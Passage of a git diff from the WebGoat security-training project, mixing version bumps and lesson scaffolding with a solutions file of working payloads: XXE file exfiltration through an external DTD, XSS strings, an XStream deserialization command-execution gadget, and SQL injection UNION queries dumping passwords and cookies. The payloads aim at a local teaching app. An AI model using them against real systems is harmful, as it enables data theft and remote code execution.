+     
+      <pre>
+          <?xml version="1.0" encoding="UTF-8"?>
+          <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
+          <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
+           %all;
+      </pre>
+     
+      This will be reduced to:
+     
+      <pre>
+          <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
+      </pre>
+     
+      Wire it all up in the xml send to the server:
+     
+      <pre>
+       <?xml version="1.0"?>
+       <!DOCTYPE root [
+       <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
+       %remote;
+        ]>
+       <user>
+         <username>test&send;</username>
+       </user>
+     
+      </pre>
+     
+     
+```
+
+### XSS ###
+```javascript
+<script>alert('my javascript here')</script>4128 3214 0002 1999
+``` 
+
+DOM-XSS:  
+
+  Something like 
+  `http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+//`   
+OR  
+`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`  
+
+### Vuln - Components ###
+
+Jquery page: - it is contrived; but paste that in each box  
+```javascript
+OK<script>alert("XSS")<\/script>
+OK<script>alert("XSS")<\/script>
+```
+for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
+```html  
+<sorted-set>  
+ <string>foo</string>
+ <dynamic-proxy>
+   <interface>java.lang.Comparable</interface>
+   <handler class="java.beans.EventHandler">
+     <target class="java.lang.ProcessBuilder">
+       <command>
+         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
+       </command>
+     </target>
+     <action>start</action>
+   </handler>
+ </dynamic-proxy>
+</sorted-set>
+
+```

webgoat-lessons/sol.txt

@@ -11,6 +11,7 @@ bender@juice-sh.op' --
 101 or 1=1
 
 Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+Smith' union select all 1, '2' ,user_name,password, 'MC', cookie, 2 from user_system_data --
 
 ## XXE ##
 

webgoat-lessons/sql-injection/pom.xml

@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
 </project>

webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content6.adoc

@@ -1,15 +1,29 @@
 == Special Characters
 
+[source]
+----
 /* */ 	 are inline comments
 -- , # 	 are line comments
-'Select * from users where name = ‘admin’--and pass = ‘pass’'
 
+Example: Select * from users where name = 'admin' --and pass = 'pass'
+----
+
+
+[source]
+----
 ;        allows query chaining
-'Select * from users; drop table users;'
 
-’,+,||	allows string concatenation 
+Example: Select * from users; drop table users;
+----
+
+[source]
+----
+',+,||	 allows string concatenation
 Char()	 strings without quotes
-'Select * from users where name = ‘+char(27) or 1=1'
+
+Example: Select * from users where name = '+char(27) or 1=1
+----
+
 
 ==  Special Statements
 

webgoat-lessons/vulnerable-components/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0.0.M2</version>
+        <version>8.0.0.M3</version>
     </parent>
     <dependencies>
         <dependency>

webgoat-lessons/webgoat-introduction/pom.xml

@@ -1,12 +1,11 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
     <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-lesson-template</artifactId>
+    <artifactId>webgoat-introduction</artifactId>
     <packaging>jar</packaging>
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.0-SNAPSHOT</version>
+        <version>8.0.0.M3</version>
     </parent>
-
 </project>

webgoat-lessons/webgoat-introduction/pom.xml.versionsBackup

@@ -0,0 +1,11 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <artifactId>webwolf-introduction</artifactId>
+    <packaging>jar</packaging>
+    <parent>
+        <groupId>org.owasp.webgoat.lesson</groupId>
+        <artifactId>webgoat-lessons-parent</artifactId>
+        <version>8.0-SNAPSHOT</version>
+    </parent>
+</project>

webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/plugin/WebGoatIntroduction.java

@@ -1,9 +1,9 @@
 package org.owasp.webgoat.plugin;
 
-import com.beust.jcommander.internal.Lists;
 import org.owasp.webgoat.lessons.Category;
 import org.owasp.webgoat.lessons.NewLesson;
 
+import java.util.ArrayList;
 import java.util.List;
 
 /**
@@ -31,35 +31,33 @@ import java.util.List;
  * projects.
  * <p>
  *
- * @author misfir3
+ * @author WebGoat
  * @version $Id: $Id
- * @since January 3, 2017
+ * @since October 12, 2016
  */
-public class LessonTemplate extends NewLesson {
-
+public class WebGoatIntroduction extends NewLesson {
     @Override
     public Category getDefaultCategory() {
-        return Category.GENERAL;
+        return Category.INTRODUCTION;
     }
 
     @Override
     public List<String> getHints() {
-        return Lists.newArrayList();
+        return new ArrayList();
     }
 
     @Override
     public Integer getDefaultRanking() {
-        return 30;
+        return 1;
     }
 
     @Override
     public String getTitle() {
-        return "lesson-template.title";
+        return "webgoat.title";
     }
 
     @Override
     public String getId() {
-        return "LessonTemplate";
+        return "WebGoatIntroduction";
     }
-
 }

webgoat-lessons/webgoat-introduction/src/main/resources/html/WebGoatIntroduction.html

@@ -0,0 +1,8 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+
+<div class="lesson-page-wrapper">
+    <div class="adoc-content" th:replace="doc:Introduction.adoc"></div>
+</div>
+
+</html>

webgoat-lessons/webgoat-introduction/src/main/resources/i18n/WebGoatLabels.properties

@@ -0,0 +1 @@
+webgoat.title=WebGoat

webgoat-lessons/webgoat-introduction/src/main/resources/lessonPlans/en/Introduction.adoc

@@ -0,0 +1,18 @@
+== What is WebGoat?
+---
+
+WebGoat is a deliberately insecure application that allows interested developers just like you to _test vulnerabilities_
+commonly found in Java-based applications that use common and popular open source components.
+
+Now, while we in no way condone causing intentional harm to any animal, goat or otherwise, we think learning everything
+you can about security vulnerabilities is essential to understanding just what happens when even a small bit of
+unintended code gets into your applications.
+
+What better way to do that than with your very own scapegoat?
+
+Feel free to do what you will with Hack. Poke, prod and if it makes you feel better, scare him until your heart’s content.
+Go ahead, and Hack the goat. We promise he likes it.
+
+Thanks for your interest!
+
+*The WebGoat Team*

webgoat-lessons/webgoat-lesson-template/getting-started.MD

@@ -0,0 +1,70 @@
+### To include lesson template in build ###
+1. Edit the webgoat-server/pom.xml file and uncomment the section under  
+  ```xml  
+   <!--uncommment below to run/include lesson template in WebGoat Build-->  
+  ```
+
+2. Also uncomment in webgoat-lessons/pom.xml where it says    
+  ```xml  
+   <!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
+  ```  
+  
+### To add a lesson to WebGoat ###
+
+There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
+
+0. The POM file  
+
+    *  Change the line to give your lesson its own artifactId.   
+        That should be all you need to do there:  
+	```xml  
+	 <artifactId>webgoat-lesson-template</artifactId>  
+	```  
+1. The Base Class  
+
+    *  The name of the class (file and class name) to better match your lesson. (e.g. `sql-injection` >> `SqlInjection`)  
+    *  The category in which you want your lesson to be in. You can create a new category if you want, or put in an issue to have one added.  
+    * The `defaultRanking` will move your lesson up or down in the categories list.  
+    * Implement a new key name pair `lesson-template.title` (the key) and update the same key/value pair `your.key=your value` in src/main/resources/i18n/WebGoatLabels.properties.  
+    * Implement a new value for the `getId` method, which leads us to...  
+
+2. The HTML content framing  
+
+    * Rename the provided file in src/main/resources/html using your value from the `getId` method in your lesson's base class:  
+	e.g.   
+	`public String getId() { return "your-lesson";  }` >> `your-lesson.html`   
+    * Modify that file following the commented instructions in there.   
+    * In conjunction with this file you.  
+
+3. Assignment Endpoints    
+    * In the above html file, you will see an example of an 'attack form'. You can create endpoints to handle these attacks and provide the user feedback and simulated output. See the example file here as well as other existing lessons for ways to extend these.  You will extend the `AssignmentEndpoint` as the example will show:  
+    * You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
+    * See other lesson examples for creating unit/integration tests for your project as well.
+
+
+4. Getting your lesson to show up  
+
+    * Modify the webgoat-lessons/pom.xml to include your project in the `<modules>` section:  
+        ```xml
+	  <modules>
+	             <!-- ... -->
+	     <module>webgoat-lesson-template</module>
+		     <!-- ... -->
+	  </modules>
+        ```
+	
+    * Modify the webgoat-server/pom.xml to add your project as a dependency in the `<dependencies>` section:   
+       ```xml
+         <dependencies>
+	             <!-- .... >
+           <dependency>
+              <groupId>org.owasp.webgoat.lesson</groupId>
+              <artifactId>your-artfifact-id-here</artifactId>
+              <version>${project.version}</version>
+           </dependency>
+                     <!-- .... >
+        </dependencies>
+    ```
+        
+
+5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template

webgoat-lessons/webgoat-lesson-template/getting-started.txt

@@ -1,55 +0,0 @@
-##### To include lesson template in build #####
-1. edit theh webgoat-server/pom.xml file and uncomment the section under ...
-<!--uncommment below to run/include lesson template in WebGoat Build-->
-
-2. Also uncomment in webgoat-lessons/pom.xml where it says ...
-<!-- uncomment below to include lesson template in build, also uncomment the dependency in webgoat-server/pom.xml-->
-
-##### To add a lesson to WebGoat #####
-
-There are a number of moving parts and this sample lesson will help you navigate those parts. Most of your work will be done in two directories. To start though, you can copy this directory with the name of your-lesson in the webgoat-lessons directory.
-
-0. The POM file
-	a. change the ...
-	<artifactId>webgoat-lesson-template</artifactId>
-	... line to give your lesson its own artifactId.That should be all you need to do there
-
-1.	The Base Class ...
-        a. The name of the class (file and class name) to better match your lesson (e.g. sql-injection >> SqlInjection)
-        b. the category in which you want your lesson to be in.  You can create a new category if you want, or put in an issue to have one added
-        c. The 'defaultRanking' will move your lesson up or down in the categories list
-        d. implement a new key name pair "lesson-template.title" (the key) and update the same key/value pair (your.key=your value) in src/main/resources/i18n/WebGoatLabels.properties
-        e. Implement a new value for the getId method, which leads us to ...
-
-2. The HTML content framing ...
-	a. Rename the provided file in src/main/resources/html using your value from the getId method in your lesson's base class (e.g. public String getId() { return "your-lesson";  } >> "your-lesson.html")
-	b. Modify that file following the commented instructions in there
-	c. In conjunction with this file you
-
-3. Assignment Endpoints
-	a. In the above html file, you will see an example of an 'attack form'.  You can create endpoints to handle these attacks and provide the user feedback and simulated output.  See the example file here as well as other existing lessons for ways to extend these.  You will extend the AssignmentEndpoint as the example will show
-	b. You can also create supporting (non-assignment) endpoints, that are not evaluated/graded.  
-	c. See other lesson examples for creating unit/integration tests for your project as well
-
-
-4. Getting your lesson to show up
-	a. modify the webgoat-lessons/pom.xml to include your project in the <modules> section
-	<modules>
-		<!-- ... -->
-		<module>webgoat-lesson-template</module>
-		<!-- ... -->
-	</modules>
-
-	b. modify the webgoat-server/pom.xml to add your project as a dependency in the <dependencies> section ...
-	<dependencies>
-		<!-- .... >
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>your-artfifact-id-here</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <!-- .... >
-    <dependencies>
-
-
-5. You should be ready to run and test your project. Please create issues at https://github.com/WebGoat/WebGoat if there errors or confusion with this documentation/template